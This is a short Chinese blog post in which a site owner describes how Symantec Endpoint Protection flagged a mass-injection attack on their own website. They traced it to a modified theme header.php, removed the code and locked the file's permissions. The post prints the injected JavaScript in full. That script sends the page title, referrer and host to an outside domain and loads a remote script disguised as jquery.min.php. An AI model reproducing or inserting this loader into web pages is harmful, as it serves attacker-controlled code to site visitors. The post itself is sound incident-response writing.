共计 1048 个字符,预计需要花费 3 分钟才能阅读完成。
今天访问自己网站时 SEP 提示 [SID: 28821] 已禁止 Web Attack: Mass Injection Website 19 攻击。已禁止此应用程序的通信: C:PROGRAM FILES (X86)MOZILLA FIREFOXFIREFOX.EXE,然后就禁止访问网站, 客户端将禁止来自 IP 地址 x.x.x.x 的通信 (于接下来的 600 秒,即从 2016/1/28 9:15:24 到 2016/1/28 9:25:24)。
到 SEP 管理查询了下相关的信息,说是脚本注入。
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821
然后登陆到 VPS 上检查最近被修改的文件
find -ctime -1 检查最近 1 天被修改的文件
发现除了 cache 和 sitemap 之外只有一个主题下的 header.php 文件被修改。
打开这个文件和之前备份对比,发现在每个 </head> 之前都被加了一行代码
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base ="http://theclassicalfourplus1.com/js/jquery.min.php"; var n_url = base +"?default_keyword="+ default_keyword +"&se_referrer="+ se_referrer +"&source="+ host; var f_url = base +"?c_utt=snt2014&c_utm="+ encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !=='' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="'+ f_url +'">'+'<'+'/script>');}</script>
删除这行代码,并将 header.php 文件权限设定为 444。
至于问题基本解决。
